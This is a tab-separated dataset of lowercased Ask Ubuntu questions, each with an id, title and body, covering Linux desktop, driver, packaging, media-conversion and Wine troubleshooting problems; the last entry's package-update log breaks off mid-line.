159663	how to reset the xorg / xserver ?	xserver keeps crashing on my general user account both in unity 3d and 2d . it does n't do it on the guest account . that 's why i want to reset / rollback everything xserver related , hoping this is going to fix it . most answers on this involve sudo dpkg-reconfigure xserver-xorg . however , this does nothing for me ( generates no output ) and i read in other forums , that it 's deprecated . so , what 's the current way to reset all xserver / xorg options ; what 's the alternative to sudo dpkg-reconfigure xserver-xorg ? x crashes during work , not before login or so . and the effect of a crash is , that i get thrown out of the session , not a freeze or machine crash .
159664	how to list user installed applications ( not packages ) ?	not packages and not all applications . just the applications user installed by himself from whatever source ( software center , manually added ppa , etc. ) . if the above is not possible - a list of all installed applications or at least a gui which lists the applications so i can take screenshots of it . i 've read a dozen of similar questions and people posting answers usually do n't even get close to op question merit . please note that my question includes 'user installed ' . answer : it is not currently possible in ubuntu linux . ( choosing tijybba 's answer as the closest one though )
159666	fastest way to put a lot of files togheter into 1 big chunk	i want to avoid the creation of an archive because it takes a significant amount of time and cpu power , since i have to transfer a big folder among different filesystem i would like to have all the data in just 1 file .
159673	how to use gsettings from /opt	i have to use gsettings from /opt so that ubuntu maintainers will accept my application . i may not use /usr or any of the underlying directories so /usr/share/glib-2.0/schemas is not an option .
159683	please help ! ubuntu 12.04 suddenly does n't start after i tried to install a software .	i have been using ubuntu 12.04 for a few days now . it worked perfectly until today , when i tried to do the following : using the software center , i tried to install scilab , a scientific computing software . as it was being installed , i was trying to multitask , during which i realized that it was taking up too much ram . in fact , it was way slower than multitasking in my windows vista . it did n't appear like the software installation was going to proceed , let alone end . so i pressed and held the power button to shut down the computer ( first time i have had to do this for ubuntu ) . when the computer restarted , it was unusually slow ; and i logged into my ubuntu user profile as usual . and then the computer did n't go past the wallpaper . no icons , no menus , nothing -- just my wall paper for half-an-hour . i have an online assignment that 's due . please help me with this . thank you .
159684	amnesia running very slowly	so i installed amnesia the dark descent and everything seemed fine until i made it to making a profile and starting screen . it ran very slowly and i could n't even move the mouse and had to restart the computer . maybe it 's about my graphics card ? i have a nvidia corporation mcp61 high definition audio graphics card.. thanks ! : )
159690	an error has occurred when creating debian packaging	i execute quickly share and i get launchpad connection is ok ... ... .. command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- warning : the following files are not recognized by distutilsextra.auto : mangar/.bzr/readme mangar/.bzr/branch-format mangar/.bzr/branch/branch.conf mangar/.bzr/branch/format mangar/.bzr/branch/last-revision mangar/.bzr/branch/tags mangar/.bzr/checkout/conflicts mangar/.bzr/checkout/dirstate mangar/.bzr/checkout/format mangar/.bzr/checkout/views mangar/.bzr/repository/format mangar/.bzr/repository/pack-names -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : share command failed aborting the previous time i run the command everything worked ! the previous time i was using ubuntu but now i am using linux mint 13 ... i get the same error with quickly package ! i need to package my app for the contest.. edit : now i get this too -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : python module helpers not found error : python module window not found error : python module mangarconfig not found error : python module builder not found those files exist in the package_lib folder , why it can not find them ?
159692	how do i make dvd : :rip not freeze halfway through a dvd ?	when trying to rip a dvd , it freezes after 30 minutes . when i try to transcode a small part of the dvd , i get this error .
159693	window buttons do not belong to the top window ?	sometimes in ubuntu 12.04 ( no modifications ) , when application x is on top of the screen ( i.e . it is the window that i see ) , the close and minimise buttons are not from application x . thus , when i click 'close ' suddenly another application gets closed and not the one that appeared on top . why is this so ? and how can i fix it ?
159704	no useful dvb-t card found	i am using ubuntu 12.04 with 3.2.0-26 kernel and i just added a dvb-t card . i installed the media_build as shown in this page . after that the restricted drivers appeared on the screen i installed the firmware for dvb cards . lsusb shows : bus 002 device 005 : id 048d:9005 integrated technology express , inc . which is my card . lsmod shows these things regarding dvb : dvb_usb_it913x 22173 0 dvb_usb 32369 1 dvb_usb_it913x dvb_core 110010 1 dvb_usb rc_core 26343 2 dvb_usb_it913x , dvb_usb nevertheless there is no /dev/dvb on my system and kaffeine does not find the tv turner . how can i install my tv card ?
159707	how do i figure out which version of opencl comes with my nvidia-current-dev package ?	i am running ubuntu 10.04 with an nvidia geforce gt 240 card . i installed nvidia-current-dev with apt-get , thus i got a bunch of headers and lib files for opencl . however , i am unable to figure out if i have opencl 1.0 or 1.1 ( could be 1.2 , though i doubt it ) . does anyone know a way to figure out which version of opencl comes with the nvidia-current-dev package ( version : 195.36.24-0ubuntu1~10.04.2 ) ? if not , is there another place where i could get an answer ?
159708	convert mkv to mp4 with ffmpeg	when i try converting mkv to mp4 using ffmpeg , the following error occurs : version 0.8.3-4:0.8.3-0ubuntu0.12.04.1 , copyright ( c ) 2000-2012 the libav developers built on jun 12 2012 16:52:09 with gcc 4.6.3 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . [ matroska , webm @ 0x1e939c0 ] max_analyze_duration reached [ matroska , webm @ 0x1e939c0 ] estimating duration from bitrate , this may be inaccurate input # 0 , matroska , webm , from 'input.mkv ' : duration : 00:01:00.76 , start : 0.000000 , bitrate : 384 kb/s stream # 0.0 ( eng ) : video : h264 ( high ) , yuv420p , 1280x544 , par 1:1 dar 40:17 , 25 fps , 25 tbr , 1k tbn , 50 tbc ( default ) stream # 0.1 ( eng ) : audio : ac3 , 48000 hz , 5.1 , s16 , 384 kb/s ( default ) stream # 0.2 ( eng ) : subtitle : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 output # 0 , ipod , to 'output.m4v ' : metadata : encoder : lavf53.21.0 stream # 0.0 ( eng ) : video : libx264 , yuv420p , 1280x544 [ par 1:1 dar 40:17 ] , q=2-31 , 25 tbn , 25 tbc ( default ) stream # 0.1 ( eng ) : audio : ac3 , 48000 hz , 5.1 , 384 kb/s ( default ) stream mapping : stream # 0.0 - > # 0.0 stream # 0.1 - > # 0.1 press ctrl-c to stop encoding [ ipod @ 0x1e9b740 ] application provided invalid , non monotonically increasing dts to muxer in stream 0 : -2 > = -2 av_interleaved_write_frame ( ) : invalid argument i used this command to convert the file : ffmpeg -i input.mkv -vcodec copy -acodec copy -absf aac_adtstoasc output.m4v the input file has the following characteristics : mediainfo input.mkv > general > > unique id : 200459305952356554213392832683163418790 ( 0x96cf0ed8db5914cbb9e18163689280a6 ) > complete name : input.mkv > format : matroska > format version : version 2 > file size : 1.46 gib > duration : 1h 5mn > overall bit rate : 3 168 kbps > encoded date : utc 2010-09-26 21:44:02 > writing application : mkvmerge v2.9.5 ( 'tu es le seul ' ) built on > jun 17 2009 16:28:30 > writing library : libebml v0.7.8 + libmatroska v0.8.1 > > video > id : 1 > format : avc > format/info : advanced video codec > format profile : high @ l3.1 > format settings , cabac : yes > format settings , reframes : 4 frames > codec id : v_mpeg4/iso/avc > duration : 1h 5mn > bit rate : 2 910 kbps > width : 1 280 pixels > height : 720 pixels > display aspect ratio : 16:9 > frame rate : 25.000 fps > color space : yuv > chroma subsampling : 4:2:0 > bit depth : 8 bits > scan type : progressive > bits/ ( pixel*frame ) : 0.126 > stream size : 1.31 gib ( 90 % ) > writing library : x264 core 105 r1724 b02df7b > encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x3:0x113 / me=hex / subme=6 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=0 / me_range=16 / chroma_me=1 / trellis=1 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-2 / threads=18 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / constrained_intra=0 / bframes=3 / b_pyramid=2 / b_adapt=1 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=0 / keyint=250 / keyint_min=25 / scenecut=40 / intra_refresh=0 / rc=2pass / mbtree=0 / bitrate=2910 / ratetol=1.0 / qcomp=0.60 / qpmin=10 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / ip_ratio=1.40 / pb_ratio=1.30 / aq=1:1.00 > > default : yes > forced : no > > audio > id : 2 > format : ac-3 > format/info : audio coding 3 > mode extension : cm ( complete main ) > codec id : a_ac3 > duration : 1h 5mn > bit rate mode : constant > bit rate : 256 kbps > channel ( s ) : 2 channels > channel positions : front : l r > sampling rate : 48.0 khz > bit depth : 16 bits > compression mode : lossy stream size : 121 mib ( 8 % ) language : english default : yes forced : no being new to ffmpeg , i 'm not sure what the error means or how to correct it . thanks !
159709	does virtualbox permanently affect performance ?	i would like to install virtualbox as an ubuntu testing environment . must i permanently sacrifice system resources such as ram ? or only when the environment is running ?
159710	how to save a session with open programs and files ?	how can i reproduce the current session , including open programs and files on my ubuntu 11.04 laptop and rebooting ? i 've got a bunch of windows open in chromium and firefox ( this is probably the easy part ) , emacs , gnome-terminal , a pdf open in evince , mplayer paused , virtualbox manager and skype running .
159721	how do i save updates/installed packages ?	so i 've been messing with thing that probably should n't be messed with trying to learn my way around linux , and i seem to have messed something up . i 'm getting a lot of error messages , reduced speed , and crashes , so i 'm going to do a clean install . however , i an using mobile broadband and do n't exactly want to use all of it up again re-downloading updates . is there any way i can save all the packages installed now with their updates to an external hard drive ?
159722	root tasks using dbus and policykit	at some point my application needs to do administrative tasks like creating a file in /etc or running commands with root priveleges . i know just could do a q & d : os.popen ( `` pkexec foo bar '' ) but i also know that this is not the foreseen clean way to do it . some kind of annoying for the user because he always needs to reenter his password instead of having a session-like handling . i was very optimistic as i found the python example for authenticating . it 's a simple example which works immediatly : import dbus bus = dbus.systembus ( ) proxy = bus.get_object ( 'org.freedesktop.policykit1 ' , '/org/freedesktop/policykit1/authority ' ) authority = dbus.interface ( proxy , dbus_interface='org.freedesktop.policykit1.authority ' ) system_bus_name = bus.get_unique_name ( ) subject = ( 'system-bus-name ' , { 'name ' : system_bus_name } ) action_id = 'org.freedesktop.policykit.exec' details = { } flags = 1 # allowuserinteraction flag cancellation_id = '' # no cancellation id result = authority.checkauthorization ( subject , action_id , details , flags , cancellation_id ) print result i 've been quite naive thinking that after authorization i could just go on in the script with some os.popen ( ) -commands . now i know better : ( i can see the tuple-result in the example above , but in the further documentation i could not find a working code to go on at this point . what do i have to do with this result ? how can i go on performing the tasks i need ? is there a python reference with examples that offer the available methods ? i tried to list the methods of authorization by using dir ( ) but could not find any clue how to go on . i really want to avoid using my fallback but it would be my last resort . please help me doing it the right way : ) thanks and regards andrăš edit : due i did not bring this to work and my former solution by starting my program with gksu does not work out of /opt/ , i finally had to give up and implement a thousand asks for password to make the program rudimentary work to get at least a t-shirt in the app showdown . i did not notice the problem because i first did a quickly share . there everything worked right . asking once for the password at the beginning . i 'm totally down now . my contribution for appshowdown was https : //launchpad.net/armorforge . ; - (
159727	how can i use a passcode generator for authentication for remote logins ?	i would like to strengthen the authentication of my ssh logins by adding another factor : a passcode generator device , or a passcode generation application on my mobile phone . the only obvious options in the default setup are a fixed password and key pair . how can i do this ? ( if i use a password plus a passcode generator , this provides two-factor authentication ( 2fa ) : the password is “what i know” , and the passcode is “what i have” . )
159730	all of my google chrome extensions have stopped working on ubuntu and windows	i have noticed that my google chrome extensions are no longer working on ubuntu or windows , and the context menu of each extension is no longer showing up . i have noticed that this problem seems to occur on both linux and windows in google chrome , so it is most likely not platform-specific . edit : the problem has been resolved in windows after disabling all extensions .
159732	ati-radeon 9600 driver is not installing : 12.04 lts	just a heads up , everything here is being done in ubuntu , just because i already had a ppc disk . later when i have a better internet connection , i 'll use lubuntu , but this was quicker . i have a powermac g5 dual core , with the default graphics card , the radeon 9600 . great for low shaders , however i can not seem to get the driver working . for starters , when i click on `` additional drivers '' within the system settings , it flashes a window , appears in the launcher , then disappears . so , from the ati site , i downloaded the 32 bit driver in the form of a .run file . i made sure it was an executeable and then ran in through terminal . it seemed to verify and uncompress , however the installer ran into an error , and before i could read it , the window closed itself . trying through another method i found the error to be : error : distro version entered incorrectly or not supported , use -- listpkg to identify valid distro versions error : distro version entered incorrectly or not supported , use -- listpkg to identify valid distro versions removing temporary directory : fglrx-install.edusit does anyone think that the graphics card would be able to secure a driver even though the architecture that the os is currently running in is commonly unsupported ? or has anyone else found a way to run the driver for this graphics card correctly ? it has come to my attention that the driver may not have been released with ppc support , therefore that may be my problem . can anyone confirm this ?
159733	how to install windows on my ubuntu netbook from usb if bios does not support booting from usb ?	i have a netbook running ubuntu 12.04 and i would like to put windows 7 on it ( which i have on usb ) . however , my bios does n't have booting from usb as an option . it only has hdd , lan and fdd . i ca n't figure out a way to boot from my usb ... could i somehow use grub ?
159735	restoring my original keyboard mapping without logging in	i used xmodmap to remap some keys . i followed directions to restart . now , i ca n't log in . how can i restore my previous keyboard mapping ?
159737	how can i update to jdk and jre 7 ?	i 've been using jdk6 on ubuntu 12.04 . i was trying to update my jdk to 7 . i installed jdk7 and also removed jdk6 . now my javac version is 1.7.0_03 . but my java version is still 1.6.0_24 . so i got unsupportedclassversionerror while trying ro run my java project . how can i update my java ? !
159738	how to install ubuntu os on usb , without booting & ubuntu os running inside win xp 32 bit & win 7 home premium 64 bit ?	please help me install ubuntu os latest build on a kingston data traveler usb 8 gb stick fat32 , completely clean & formatted , now , without booting from usb , ubuntu os should load & run inside win xp 32 bit os & win 7 home premium 64 bit os , whenever , i insert my usb stick in any port , without using any virtual host like vmware or virtualbox & should not install ubuntu os on any machine , just like win 7 professional os & win 7 ultimate os have win xp mode running inside them , for legacy software & is able to access , modify & save all file & folders of the host machine , should run in a different interface , but here i am using a usb stick , please tell me if its possible ? ( http : //www.howtogeek.com/wp-content/uploads/2010/02/sshot472.png )
159741	trying to migrate windows 7 install of adobe cs5 to ubuntu 12.04 with wine - 'internal errors - invalid paramters received ''	i have adobe cs5 installed and running on the windows 7 side of my machine . since i 'd hate to boot up into windows just to use photoshop , i 'm trying to get it in ubuntu 12.04 . tutorials i found suggested that the easiest way to have it in ubuntu was to install wine , and copy my windows installation over . here are the exact steps i 've done up to this point . from windows , exported the registry key for hkey_local_machine > > software > > adobe to the desktop . changed to ubuntu , downloaded wine from software center terminal : $ sudo apt-get install wine ttf-mscorefonts-installer $ winecfg $ wget http : //www.kegel.com/wine/winetricks $ sh winetricks msxml6 gdiplus gecko vcrun2005sp1 vcrun2008 msxml3 atmlib moved registry export to home folder . copied '' program files ( x86 ) \adobe '' to `` ~/.wine/drive_c/program files ( x86 ) /adobe '' '' program files ( x86 ) \common files\adobe '' to `` ~/.wine/drive_c/program files ( x86 ) /common files/adobe '' '' documents and settings\don\application data\adobe '' to `` ~/.wine/drive_c/users/don/application data/adobe '' '' windows\system32\odbcint.dll '' to `` ~/.wine/drive_c/windows/system32/odbcint.dll '' , and lastly '' windows\system32\odbc32.dll '' to `` ~/.wine/drive_c/windows/system32/odbc32.dll '' . from terminal , $ wine regedit adobe.reg . right clicked on photoshop.exe and selected `` open with wine '' . got the message `` wine program crash , internal errors - invalid parameters received . '' so to restate my question , how can i get photoshop running in ubuntu 12.04 ? i 'm not sold on doing it in this specific way , i just want to use photoshop without having to reboot . what 's the best way to make this happen ? edit : i do not have the installation cd , no .
159743	what is the incentive to provide a free operating system ?	what is the incentive to provide a free operating system ? why do all this work for no pay ? why not sell it ?
159744	problem updating linux image 3.2.0-26 generic to 3.2.0-26.41	here are the details of failed package operation . installarchives ( ) failed : extracting templates from packages : 50 % % extracting templates from packages : 100 % % extracting templates from packages : 50 % % extracting templates from packages : 100 % % extracting templates from packages : 50 % % extracting templates from packages : 100 % % extracting templates from packages : 50 % % extracting templates from packages : 100 % % ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 280864 files and directories currently installed . ) preparing to replace cron 3.0pl1-120ubuntu3 ( using ... /cron_3.0pl1-120ubuntu4_amd64.deb ) ... cron stop/waiting unpacking replacement cron ... preparing to replace libgnutls26 : i386 2.12.14-5ubuntu3 ( using ... /libgnutls26_2.12.14-5ubuntu3.1_i386.deb ) ... de-configuring libgnutls26 ... unpacking replacement libgnutls26 : i386 ... preparing to replace libgnutls26 2.12.14-5ubuntu3 ( using ... /libgnutls26_2.12.14-5ubuntu3.1_amd64.deb ) ... unpacking replacement libgnutls26 ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up libgnutls26 : i386 ( 2.12.14-5ubuntu3.1 ) ... setting up libgnutls26 ( 2.12.14-5ubuntu3.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 280864 files and directories currently installed . ) preparing to replace gir1.2-dbusmenu-gtk-0.4 0.6.1-0ubuntu3 ( using ... /gir1.2-dbusmenu-gtk-0.4_0.6.2-0ubuntu0.1_amd64.deb ) ... unpacking replacement gir1.2-dbusmenu-gtk-0.4 ... preparing to replace libdbusmenu-gtk4 0.6.1-0ubuntu3 ( using ... /libdbusmenu-gtk4_0.6.2-0ubuntu0.1_amd64.deb ) ... unpacking replacement libdbusmenu-gtk4 ... preparing to replace gir1.2-dbusmenu-glib-0.4 0.6.1-0ubuntu3 ( using ... /gir1.2-dbusmenu-glib-0.4_0.6.2-0ubuntu0.1_amd64.deb ) ... unpacking replacement gir1.2-dbusmenu-glib-0.4 ... preparing to replace libdbusmenu-glib4 0.6.1-0ubuntu3 ( using ... /libdbusmenu-glib4_0.6.2-0ubuntu0.1_amd64.deb ) ... unpacking replacement libdbusmenu-glib4 ... preparing to replace libdbusmenu-gtk3-4 0.6.1-0ubuntu3 ( using ... /libdbusmenu-gtk3-4_0.6.2-0ubuntu0.1_amd64.deb ) ... unpacking replacement libdbusmenu-gtk3-4 ... preparing to replace libmtp-common 1.1.3-1 ( using ... /libmtp-common_1.1.3-1ubuntu0.1_all.deb ) ... unpacking replacement libmtp-common ... preparing to replace libmtp-runtime 1.1.3-1 ( using ... /libmtp-runtime_1.1.3-1ubuntu0.1_amd64.deb ) ... unpacking replacement libmtp-runtime ... preparing to replace libmtp9 1.1.3-1 ( using ... /libmtp9_1.1.3-1ubuntu0.1_amd64.deb ) ... unpacking replacement libmtp9 ... preparing to replace libxkbfile1 1:1.0.7-1 ( using ... /libxkbfile1_1 % % 3a1.0.7-1ubuntu0.1_amd64.deb ) ... unpacking replacement libxkbfile1 ... preparing to replace desktop-file-utils 0.20-0ubuntu2 ( using ... /desktop-file-utils_0.20-0ubuntu3_amd64.deb ) ... unpacking replacement desktop-file-utils ... preparing to replace nautilus-sendto-empathy 3.4.2-0ubuntu1 ( using ... /nautilus-sendto-empathy_3.4.2.1-0ubuntu1_amd64.deb ) ... unpacking replacement nautilus-sendto-empathy ... preparing to replace empathy 3.4.2-0ubuntu1 ( using ... /empathy_3.4.2.1-0ubuntu1_amd64.deb ) ... unpacking replacement empathy ... preparing to replace empathy-common 3.4.2-0ubuntu1 ( using ... /empathy-common_3.4.2.1-0ubuntu1_all.deb ) ... unpacking replacement empathy-common ... preparing to replace kate-data 4:4.8.3-0ubuntu0.1 ( using ... /kate-data_4 % % 3a4.8.4-0ubuntu0.1_all.deb ) ... unpacking replacement kate-data ... preparing to replace libkdeclarative5 4:4.8.3-0ubuntu0.1 ( using ... /libkdeclarative5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkdeclarative5 ... preparing to replace libnepomuksync4 4:4.8.3-0ubuntu0.1 ( using ... /libnepomuksync4_4 % % 3a4.8.4-0ubuntu0.1_amd64.deb ) ... unpacking replacement libnepomuksync4 ... preparing to replace kde-runtime 4:4.8.3-0ubuntu0.1 ( using ... /kde-runtime_4 % % 3a4.8.4-0ubuntu0.1_amd64.deb ) ... unpacking replacement kde-runtime ... preparing to replace kdoctools 4:4.8.3-0ubuntu0.1 ( using ... /kdoctools_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement kdoctools ... preparing to replace kdelibs-bin 4:4.8.3-0ubuntu0.1 ( using ... /kdelibs-bin_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement kdelibs-bin ... preparing to replace libkjsembed4 4:4.8.3-0ubuntu0.1 ( using ... /libkjsembed4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkjsembed4 ... preparing to replace libkemoticons4 4:4.8.3-0ubuntu0.1 ( using ... /libkemoticons4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkemoticons4 ... preparing to replace libkdesu5 4:4.8.3-0ubuntu0.1 ( using ... /libkdesu5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkdesu5 ... preparing to replace libplasma3 4:4.8.3-0ubuntu0.1 ( using ... /libplasma3_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libplasma3 ... preparing to replace libkrosscore4 4:4.8.3-0ubuntu0.1 ( using ... /libkrosscore4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkrosscore4 ... preparing to replace libkcmutils4 4:4.8.3-0ubuntu0.1 ( using ... /libkcmutils4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkcmutils4 ... preparing to replace libkde3support4 4:4.8.3-0ubuntu0.1 ( using ... /libkde3support4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkde3support4 ... preparing to replace libkmediaplayer4 4:4.8.3-0ubuntu0.1 ( using ... /libkmediaplayer4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkmediaplayer4 ... preparing to replace libkdewebkit5 4:4.8.3-0ubuntu0.1 ( using ... /libkdewebkit5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkdewebkit5 ... preparing to replace libkparts4 4:4.8.3-0ubuntu0.1 ( using ... /libkparts4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkparts4 ... preparing to replace libknewstuff3-4 4:4.8.3-0ubuntu0.1 ( using ... /libknewstuff3-4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libknewstuff3-4 ... preparing to replace libknotifyconfig4 4:4.8.3-0ubuntu0.1 ( using ... /libknotifyconfig4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libknotifyconfig4 ... preparing to replace libnepomukutils4 4:4.8.3-0ubuntu0.1 ( using ... /libnepomukutils4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libnepomukutils4 ... preparing to replace libnepomukquery4a 4:4.8.3-0ubuntu0.1 ( using ... /libnepomukquery4a_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libnepomukquery4a ... preparing to replace libkpty4 4:4.8.3-0ubuntu0.1 ( using ... /libkpty4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkpty4 ... preparing to replace libkfile4 4:4.8.3-0ubuntu0.1 ( using ... /libkfile4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkfile4 ... preparing to replace libkio5 4:4.8.3-0ubuntu0.1 ( using ... /libkio5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkio5 ... preparing to replace libnepomuk4 4:4.8.3-0ubuntu0.1 ( using ... /libnepomuk4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libnepomuk4 ... preparing to replace libkntlm4 4:4.8.3-0ubuntu0.1 ( using ... /libkntlm4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkntlm4 ... preparing to replace libkjsapi4 4:4.8.3-0ubuntu0.1 ( using ... /libkjsapi4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkjsapi4 ... preparing to replace libkdnssd4 4:4.8.3-0ubuntu0.1 ( using ... /libkdnssd4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkdnssd4 ... preparing to replace libkidletime4 4:4.8.3-0ubuntu0.1 ( using ... /libkidletime4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkidletime4 ... preparing to replace libkdeui5 4:4.8.3-0ubuntu0.1 ( using ... /libkdeui5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkdeui5 ... preparing to replace libkdecore5 4:4.8.3-0ubuntu0.1 ( using ... /libkdecore5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkdecore5 ... preparing to replace kde-runtime-data 4:4.8.3-0ubuntu0.1 ( using ... /kde-runtime-data_4 % % 3a4.8.4-0ubuntu0.1_all.deb ) ... unpacking replacement kde-runtime-data ... preparing to replace katepart 4:4.8.3-0ubuntu0.1 ( using ... /katepart_4 % % 3a4.8.4-0ubuntu0.1_amd64.deb ) ... unpacking replacement katepart ... preparing to replace kdelibs5-data 4:4.8.3-0ubuntu0.1 ( using ... /kdelibs5-data_4 % % 3a4.8.4a-0ubuntu0.1_all.deb ) ... unpacking replacement kdelibs5-data ... preparing to replace kdelibs5-plugins 4:4.8.3-0ubuntu0.1 ( using ... /kdelibs5-plugins_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement kdelibs5-plugins ... preparing to replace libkhtml5 4:4.8.3-0ubuntu0.1 ( using ... /libkhtml5_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkhtml5 ... preparing to replace libktexteditor4 4:4.8.3-0ubuntu0.1 ( using ... /libktexteditor4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libktexteditor4 ... preparing to replace libsolid4 4:4.8.3-0ubuntu0.1 ( using ... /libsolid4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libsolid4 ... preparing to replace libnepomukdatamanagement4 4:4.8.3-0ubuntu0.1 ( using ... /libnepomukdatamanagement4_4 % % 3a4.8.4-0ubuntu0.1_amd64.deb ) ... unpacking replacement libnepomukdatamanagement4 ... preparing to replace plasma-scriptengine-javascript 4:4.8.3-0ubuntu0.1 ( using ... /plasma-scriptengine-javascript_4 % % 3a4.8.4-0ubuntu0.1_amd64.deb ) ... unpacking replacement plasma-scriptengine-javascript ... preparing to replace libthreadweaver4 4:4.8.3-0ubuntu0.1 ( using ... /libthreadweaver4_4 % % 3a4.8.4a-0ubuntu0.1_amd64.deb ) ... unpacking replacement libthreadweaver4 ... preparing to replace libkatepartinterfaces4 4:4.8.3-0ubuntu0.1 ( using ... /libkatepartinterfaces4_4 % % 3a4.8.4-0ubuntu0.1_amd64.deb ) ... unpacking replacement libkatepartinterfaces4 ... preparing to replace xserver-common 2:1.11.4-0ubuntu10.2 ( using ... /xserver-common_2 % % 3a1.11.4-0ubuntu10.3_all.deb ) ... unpacking replacement xserver-common ... preparing to replace xserver-xorg-core 2:1.11.4-0ubuntu10.2 ( using ... /xserver-xorg-core_2 % % 3a1.11.4-0ubuntu10.3_amd64.deb ) ... unpacking replacement xserver-xorg-core ... processing triggers for hal ... regenerating hal fdi cache ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... processing triggers for gconf2 ... processing triggers for libglib2.0-0 : i386 ... processing triggers for libglib2.0-0 ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' setting up linux-image-3.2.0-26-generic ( 3.2.0-26.41 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic update-initramfs : generating /boot/initrd.img-3.2.0-26-generic warning : no support for locale : en_us.utf8 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic /usr/sbin/grub-mkconfig : 33 : /etc/default/grub : tmpfs : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-26-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-26-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends 